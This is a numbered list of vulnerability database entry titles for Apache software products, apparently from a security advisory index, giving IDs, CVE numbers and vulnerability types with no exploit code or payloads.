3728| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
3729| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
3730| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
3731| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
3732| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
3733| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
3734| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
3735| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
3736| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
3737| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
3738| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
3739| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
3740| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
3741| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
3742| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
3743| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
3744| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
3745| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
3746| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
3747| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
3748| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
3749| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
3750| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
3751| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
3752| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
3753| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
3754| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
3755| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
3756| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
3757| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
3758| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
3759| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
3760| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
3761| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
3762| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
3763| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
3764| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
3765| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
3766| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
3767| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
3768| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
3769| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
3770| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
3771| [95675] Apache Struts Remote Code Execution Vulnerability
3772| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
3773| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
3774| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
3775| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
3776| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
3777| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
3778| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
3779| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
3780| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
3781| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
3782| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
3783| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
3784| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
3785| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
3786| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
3787| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
3788| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
3789| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
3790| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
3791| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
3792| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
3793| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
3794| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
3795| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
3796| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
3797| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
3798| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
3799| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
3800| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
3801| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
3802| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
3803| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
3804| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
3805| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
3806| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
3807| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
3808| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
3809| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
3810| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
3811| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
3812| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
3813| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
3814| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
3815| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
3816| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
3817| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
3818| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
3819| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
3820| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
3821| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
3822| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
3823| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
3824| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
3825| [91736] Apache XML-RPC Multiple Security Vulnerabilities
3826| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
3827| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
3828| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
3829| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
3830| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
3831| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
3832| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
3833| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
3834| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
3835| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
3836| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
3837| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
3838| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
3839| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
3840| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
3841| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
3842| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
3843| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
3844| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
3845| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
3846| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
3847| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
3848| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
3849| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
3850| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
3851| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
3852| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
3853| [90482] Apache CVE-2004-1387 Local Security Vulnerability
3854| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
3855| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
3856| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
3857| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
3858| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
3859| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
3860| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
3861| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
3862| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
3863| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
3864| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
3865| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
3866| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
3867| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
3868| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
3869| [86399] Apache CVE-2007-1743 Local Security Vulnerability
3870| [86397] Apache CVE-2007-1742 Local Security Vulnerability
3871| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
3872| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
3873| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
3874| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
3875| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
3876| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
3877| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
3878| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
3879| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
3880| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
3881| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
3882| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
3883| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
3884| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
3885| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
3886| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
3887| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
3888| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
3889| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
3890| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
3891| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
3892| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
3893| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
3894| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
3895| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
3896| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
3897| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
3898| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
3899| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
3900| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
3901| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
3902| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
3903| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
3904| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
3905| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
3906| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
3907| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
3908| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
3909| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
3910| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
3911| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
3912| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
3913| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
3914| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
3915| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
3916| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
3917| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
3918| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
3919| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
3920| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
3921| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
3922| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
3923| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
3924| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
3925| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
3926| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
3927| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
3928| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
3929| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
3930| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
3931| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
3932| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
3933| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
3934| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
3935| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
3936| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
3937| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
3938| [76933] Apache James Server Unspecified Command Execution Vulnerability
3939| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
3940| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
3941| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
3942| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
3943| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
3944| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
3945| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
3946| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
3947| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
3948| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
3949| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
3950| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
3951| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
3952| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
3953| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
3954| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
3955| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
3956| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
3957| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
3958| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
3959| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
3960| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
3961| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
3962| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
3963| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
3964| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
3965| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
3966| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
3967| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
3968| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
3969| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
3970| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
3971| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
3972| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
3973| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
3974| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
3975| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
3976| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
3977| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
3978| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
3979| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
3980| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
3981| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
3982| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
3983| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
3984| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
3985| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
3986| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
3987| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
3988| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
3989| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
3990| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
3991| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
3992| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
3993| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
3994| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
3995| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
3996| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
3997| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
3998| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
3999| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
4000| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
4001| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
4002| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
4003| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
4004| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
4005| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
4006| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
4007| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
4008| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
4009| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
4010| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
4011| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
4012| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
4013| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
4014| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
4015| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
4016| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
4017| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
4018| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
4019| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
4020| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
4021| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
4022| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
4023| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
4024| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
4025| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
4026| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
4027| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
4028| [68229] Apache Harmony PRNG Entropy Weakness
4029| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
4030| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
4031| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
4032| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
4033| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
4034| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
4035| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
4036| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
4037| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
4038| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
4039| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
4040| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
4041| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
4042| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
4043| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
4044| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
4045| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
4046| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
4047| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
4048| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
4049| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
4050| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
4051| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
4052| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
4053| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
4054| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
4055| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
4056| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
4057| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
4058| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
4059| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
4060| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
4061| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
4062| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
4063| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
4064| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
4065| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
4066| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
4067| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
4068| [64780] Apache CloudStack Unauthorized Access Vulnerability
4069| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
4070| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
4071| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
4072| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
4073| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
4074| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
4075| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
4076| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
4077| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
4078| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
4079| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
4080| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
4081| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
4082| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
4083| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
4084| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
4085| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
4086| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
4087| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
4088| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
4089| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
4090| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
4091| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
4092| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
4093| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
4094| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
4095| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
4096| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
